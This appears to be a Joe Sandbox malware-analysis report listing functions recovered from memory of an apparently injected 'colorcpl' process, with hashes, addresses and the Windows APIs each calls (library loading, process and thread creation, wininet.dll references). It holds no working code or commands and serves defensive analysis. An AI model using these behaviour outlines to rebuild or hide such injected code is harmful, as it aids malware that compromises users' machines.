Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b0b225517715b692d693a2e59397bba46e9db9b6fdb46a2f5e7953a6cfefa45
Instruction ID: 1bafa99786ccab8d92bc5bca105869bc5673c4c9d7b6d6710b9875fc7ffc158a
Opcode Fuzzy Hash: 4b0b225517715b692d693a2e59397bba46e9db9b6fdb46a2f5e7953a6cfefa45
Instruction Fuzzy Hash: F390026261140502E10171584844656001E8BD0381FD5C022A2065555ECAA58A92A531

Function 052A2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2EEA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18ef18acfc6841351f956c9014ba6df2ed91a250e8fe8326bf435241b0e9714b
Instruction ID: 956f9eaa5139cccf7aa298908ff90e1c0a65e4de080a804d321046a7c66b85a1
Opcode Fuzzy Hash: 18ef18acfc6841351f956c9014ba6df2ed91a250e8fe8326bf435241b0e9714b
Instruction Fuzzy Hash: 609002A221180403E14075584C4464700198BD0342F95C011A30A5555E8AA98D516535

Function 052A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2B6A

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 917b018dd69a55c5261338a03099f8ec86f8865b74fba223816e78eb080629af
Instruction ID: c43b92cad412c96c11b6e7ca58b71f7705f903cfa34a7652161ff2d3ca19b8ab
Opcode Fuzzy Hash: 917b018dd69a55c5261338a03099f8ec86f8865b74fba223816e78eb080629af
Instruction Fuzzy Hash: C29002A221240003510571584854656401E8BE0341B95C021E2055590DC5A589916525

Function 052A2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2BAA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c2ad2b442689545c41f26cadc59e6b88801b37d775328b9ba97a4cc572b1432
Instruction ID: 21797136b5ad0d8e5aaf1fb11d78859e391cfa18758587c66ee186a15b3fa1af
Opcode Fuzzy Hash: 8c2ad2b442689545c41f26cadc59e6b88801b37d775328b9ba97a4cc572b1432
Instruction Fuzzy Hash: EA90027261540802E1507158485478600198BD0341F95C011A1065654D87D58B557AA1

Function 052A2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2BEA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 531ff983f5db345a8e04c2b34d7517ad9c724ea0a46e9a7d1f35caac4b82e397
Instruction ID: 4f45e3b491a505602afae3973bbf29b32f22f4a76d6771ee30de07ff94fe5adc
Opcode Fuzzy Hash: 531ff983f5db345a8e04c2b34d7517ad9c724ea0a46e9a7d1f35caac4b82e397
Instruction Fuzzy Hash: 3990027221544842E14071584844A8600298BD0345F95C011A10A5694D96A58E55BA61

Function 052A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2BFA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa7d23ae12af6e271a03dfc0545b5caf9c0c8413da8cb516a23dc2b3f954d6bd
Instruction ID: 683a2bc65fc4cc520de9bb2d1d1962934a50ca5c5ea9ddd6395db588fc1563aa
Opcode Fuzzy Hash: aa7d23ae12af6e271a03dfc0545b5caf9c0c8413da8cb516a23dc2b3f954d6bd
Instruction Fuzzy Hash: BC90027221140802E1807158484468A00198BD1341FD5C015A1066654DCA958B597BA1

Function 052A2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2AFA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0720c927930e1f12cc94f52548e3854fc9b1513476498134b498a983258f5da6
Instruction ID: cb48f8d770b8b608249c04b1a66ee5965c468facdb915e303f5b41ac8ea04c10
Opcode Fuzzy Hash: 0720c927930e1f12cc94f52548e3854fc9b1513476498134b498a983258f5da6
Instruction Fuzzy Hash: 94900266231400021145B5580A4454B04599BD63913D5C015F2457590CC6A189655721

Function 052A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2ADA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bc256fc1babd0b11c1c80e4fdbdf3ef4fa9bca17696ef05801f5255f2770636
Instruction ID: b221183ca5bfb4b0d865e704f8bad04ba778761443929ff0cb863b1b6606fac9
Opcode Fuzzy Hash: 9bc256fc1babd0b11c1c80e4fdbdf3ef4fa9bca17696ef05801f5255f2770636
Instruction Fuzzy Hash: C2900266221400031105B5580B44547005A8BD5391395C021F2056550CD6A189615521

Function 052A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A35CA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49a38b3abbcd82c0d373472d1286f455d7b31643959a237eafc3007aba132936
Instruction ID: 00844e4d47a91cce344d4478f250eba68b4e1cc819aa74a1ec78af7de1a56821
Opcode Fuzzy Hash: 49a38b3abbcd82c0d373472d1286f455d7b31643959a237eafc3007aba132936
Instruction Fuzzy Hash: 4190027261550402E1007158495474610198BD0341FA5C411A1465568D87D58A5169A2

Function 052A39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A39BA

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af9d1ea64303e3fd78c479a329e9fad2bf87583d934c75b50f4847cab1cf32c2
Instruction ID: a500456e284c6eac890fcdaaa1f4c34306f387aa11edf733e57bad0b205fd242
Opcode Fuzzy Hash: af9d1ea64303e3fd78c479a329e9fad2bf87583d934c75b50f4847cab1cf32c2
Instruction Fuzzy Hash: 0590026225545102E150715C48446564019ABE0341F95C021A1855594D85D589556621

Function 030638C0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 0306399B

Strings

+, xrefs: 03063975
net.dll, xrefs: 03063957, 030639E6, 030639C6, 030639D2, 030639F2
wininet.dll, xrefs: 0306392E, 0306393A

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll$+
API String ID: 3472027048-3751960166
Opcode ID: 23213535b746a26a29b4233231217f69c07ef18052c77a9df65bb315252e32aa
Instruction ID: 4133e09c21601a1f6edceed96b4e6d293b84cb07a666230f60c6a6482eb06e2e
Opcode Fuzzy Hash: 23213535b746a26a29b4233231217f69c07ef18052c77a9df65bb315252e32aa
Instruction Fuzzy Hash: E2315CB5A41605BBD718DFA4CC84FEBBBB8AB88704F04855CE519AB284D7746A408FA4

Function 0305F2D9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0305F2F7
CoUninitialize.COMBASE ref: 0305F3DE

Strings

@J7<, xrefs: 0305F30B

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: a8215ca054d530da2c9e90316dd92191095f6a88469066b6dd7dfbb8439f6d45
Instruction ID: 20ac1ec7b2cee14580d963d109ce941414ac6c945637d61b74adb8ae9d3850b0
Opcode Fuzzy Hash: a8215ca054d530da2c9e90316dd92191095f6a88469066b6dd7dfbb8439f6d45
Instruction Fuzzy Hash: A23121B5A0060AEFDB00DFD8D8809EFB7B9FF88304B148559E915EB214D775EE458BA0

Function 0305F2E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0305F2F7
CoUninitialize.COMBASE ref: 0305F3DE

Strings

@J7<, xrefs: 0305F30B

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
Instruction ID: c5918f0637a64bd30a80e4db0ee87ddc632c44a37d3baa440a4c6e4ec708de5c
Opcode Fuzzy Hash: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
Instruction Fuzzy Hash: 8A3130B5A0060AEFDB00DFD8C8809EFB7B9FF88304B148559E905EB214D775EE458BA0

Function 030542F0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03054362

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction ID: a7853c947d3b4ba88b0323c13d04333c13cb48c48df709ce956e3ff83a8434be
Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction Fuzzy Hash: 35011EB9E0120DABDB10EAA5DC41FDEB7B8AB54208F0441A5EE089B245F631E758CB91

Function 030695D0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,030580BE,00000010,?,?,?,00000044,?,00000010,030580BE,?,?,?), ref: 03069630

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
Instruction ID: d205bc3e47a92cacd19821a3ce2762c37f992c126cb832d304b8c0c306992009
Opcode Fuzzy Hash: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
Instruction Fuzzy Hash: 3201C0B2204608BBCB04DE89DC80EDB77ADEFCC754F408208BA19E7244D630F8518BA4

Function 0305439C Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03054362

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction ID: 912303b1f60b3ac1638c4f28f42701df21eb913b5f84d21ae4c661c589169040
Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction Fuzzy Hash: CAF0BBB5D0220ABBDF14EFA0DC81FDEB7B4AF54608F5846A4E9049B251F631E744C791

Function 030543B1 Relevance: 1.5, APIs: 1, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03054362

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction ID: 60673bca3124c305e2eb515919f7d18ade6ee05db292dfc377ef9e5acbc82b23
Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction Fuzzy Hash: 11F09E39699B086BC3118BBA98057CAB7D4FF42900F180598EDC9C6A53E363821EC781

Function 03049D60 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03049DA5

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
Instruction ID: b809dba07050062046fe03143e5f29cc624ed5b7c84d84cbbd18bc353bc0f4a8
Opcode Fuzzy Hash: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
Instruction Fuzzy Hash: 5BF06D7738531436E634A2A9AC02FDBB38CCBC0A61F240425FA0CEB1C0D9A5B94146A5

Function 03049D5C Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03049DA5

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
Instruction ID: 528a02e6cfec00176d81c39ba4ea3334958f01ed488eb1e3ee1b0cb4a6023123
Opcode Fuzzy Hash: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
Instruction Fuzzy Hash: 8FF0927768570037E274A2989C02FDB6388CBC0B51F240125FA0CEF2C0D9A9B94146B4

Function 0305C4E6 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0305C4DA

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: c5b6caf61c6aeb6d39758aefbc8aa94f01e7c4a22d9336b449c405286fb77d38
Instruction ID: 1b83ca9104baefd977e0492447839d0dfc5d50a04f248eaad95962f252224df7
Opcode Fuzzy Hash: c5b6caf61c6aeb6d39758aefbc8aa94f01e7c4a22d9336b449c405286fb77d38
Instruction Fuzzy Hash: 2BE020216012082F9F10E57958864BBBF68D78A526B1000E8DD5241061D511C8068191

Function 03069540 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,03053BD5,000000F4), ref: 0306957C

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction ID: f211c62639a4b2472f3c4438cdb6dce6581191c561221b7edea42bd0da5ca5b7
Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction Fuzzy Hash: 99E06DB56002047FD614EE59DC41FDB33ADDFC9750F004019F908AB240D671B92086B5

Function 030694F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03051832,?,?,03051832,030654CF,?,?,03051832,030654CF,00001000), ref: 0306952F

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction ID: 4c410ab6cfd3c3fb1ab95e459075813da9d7ea15907826b29ffa0472fe3a4674
Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction Fuzzy Hash: 1FE065B6301308BFD614EE59EC45FDB73ACEFC9724F004019F908AB241D630B9208AB5

Function 03058100 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0305812C

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
Instruction ID: 29ad362799d6bb9702d1318b7227b84bdac6572628d5f20b4e588e55e3779249
Opcode Fuzzy Hash: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
Instruction Fuzzy Hash: A0E0263134030427EB64EAACDC46FA3338C9B48664F4C8A60FC5CDB6C1E978F4024358

Function 03057EF0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03051B30,03067E0E,030654CF,?), ref: 03057F23

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
Instruction ID: 6712c8e6843a36af3e41a0d9ea4bb939d3d51dc8dfb03cfb5c86faea07962fdc
Opcode Fuzzy Hash: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
Instruction Fuzzy Hash: E8D05E756983043BF684E6E59C06F9632CD9B88654F044464BA1CEB2C2ECA9F1504A65

Function 03050C0B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111), ref: 03050C17

Memory Dump Source

Source File: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3040000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction ID: 5e824fcc6cb426dfc1ba0b9007ba2acd56a0bb01ee991e60e62dc104e3d965b1
Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction Fuzzy Hash: D9D0A76770100C36A60145846CC1CFFB75CDB856A5F004063FF08D1140E521490206B0

Function 052A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052A2C24

Memory Dump Source

Source File: 00000007.00000002.4488021632.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: true

Associated: 00000007.00000002.4488021632.0000000005359000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.000000000535D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4488021632.00000000053CE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5230000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 965f156ac248a80d44cc7f92a2998ba9469519b1322dce9a97ab6b0be5ad5a77
Instruction ID: 46c42bb9ec035d8f39adfbc76de48f5305d381b8cf7ae42a3fd702ec301f73f6
Opcode Fuzzy Hash: 965f156ac248a80d44cc7f92a2998ba9469519b1322dce9a97ab6b0be5ad5a77
Instruction Fuzzy Hash: 2EB09B739115D5C6FA11E7604A08B1779157FD0741F56C061D3070641E4778C1D5E575

Non-executed Functions

Function 055804E0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4488644387.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5580000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7322755d39c82d0f9b079a38622af6349fcad5e475632202875febf31e825287
Instruction ID: c15ec00183e59afa17e2092d1a467739895f0923ea07167514ba6905b601d739
Opcode Fuzzy Hash: 7322755d39c82d0f9b079a38622af6349fcad5e475632202875febf31e825287
Instruction Fuzzy Hash: A841F87161CB0E4FD728FF689085676B3E2FB85310F50052DC58AD3262EA74D84A8785

Function 0558DF57 Relevance: 56.5, Strings: 45, Instructions: 210COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0558E0C6
@@@@, xrefs: 0558E09C
@@@@, xrefs: 0558E0B8
@@@@, xrefs: 0558E105
@@@@, xrefs: 0558E0DB
@@@@, xrefs: 0558E0E2
@@@@, xrefs: 0558E04F
@@@@, xrefs: 0558E08E
@@@@, xrefs: 0558E05D
@@@?, xrefs: 0558DFC3
@@@@, xrefs: 0558E072
@@@@, xrefs: 0558E080
@@@@, xrefs: 0558E079
)*+,, xrefs: 0558E03A
@@@@, xrefs: 0558E0E9
@@@@, xrefs: 0558E0FE
123@, xrefs: 0558E048
@@@@, xrefs: 0558E017
@@@@, xrefs: 0558E06B
@@@@, xrefs: 0558E0BF
%&'(, xrefs: 0558E033
@@@@, xrefs: 0558E095
@@@@, xrefs: 0558E11A
@@@@, xrefs: 0558E121
@@@@, xrefs: 0558E0A3
!"#$, xrefs: 0558E02C
<=@@, xrefs: 0558DFD8
-./0, xrefs: 0558E041
@@@@, xrefs: 0558E128
@@@@, xrefs: 0558E064
89:;, xrefs: 0558DFD1
@@@@, xrefs: 0558E113
@@@@, xrefs: 0558E0D4
@@@@, xrefs: 0558E10C
@@@@, xrefs: 0558E0F7
@@@@, xrefs: 0558E056
@@@@, xrefs: 0558E0F0
@@@@, xrefs: 0558E0B1
@@@@, xrefs: 0558E12F
@@@@, xrefs: 0558E087
?, xrefs: 0558E140
